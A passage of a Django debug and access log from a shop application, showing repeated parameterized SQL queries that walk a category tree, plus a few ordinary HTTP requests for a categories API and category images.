args=(3,) DEBUG 2019-12-19 10:53:57,374 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:53:57,377 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:53:57,379 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:53:57,381 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:53:57,384 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:53:57,388 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:53:57,390 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:53:57,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:53:57,395 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:53:57,398 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:53:57,400 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:53:57,404 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:53:57,406 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:53:57,409 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:53:57,411 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:53:57,414 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:53:57,417 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:53:57,420 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:53:57,422 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:53:57,424 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:53:57,427 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:53:57,432 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:53:57,434 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:53:57,436 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:53:57,438 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:53:57,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:53:57,443 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:53:57,447 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:53:57,449 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:53:57,452 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:53:57,455 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:53:57,458 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:53:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:53:58] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:53:58] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 10:56:54] "GET / HTTP/1.0" 302 0 [19/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:08:35,361 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:08:35,367 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:08:35,371 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:08:35,373 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:08:35,376 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:08:35,378 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:08:35,381 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:08:35,383 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:08:35,385 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:08:35,388 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:08:35,391 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:08:35,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:08:35,395 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:08:35,397 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:08:35,400 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:08:35,403 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:08:35,405 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:08:35,407 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:08:35,409 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:08:35,413 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:08:35,415 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:08:35,417 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:08:35,419 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:08:35,421 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:08:35,424 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:08:35,428 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:08:35,431 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:08:35,433 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:08:35,435 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:08:35,437 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:08:35,440 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:08:35,443 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:08:35,446 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:08:35,448 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:08:35,451 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 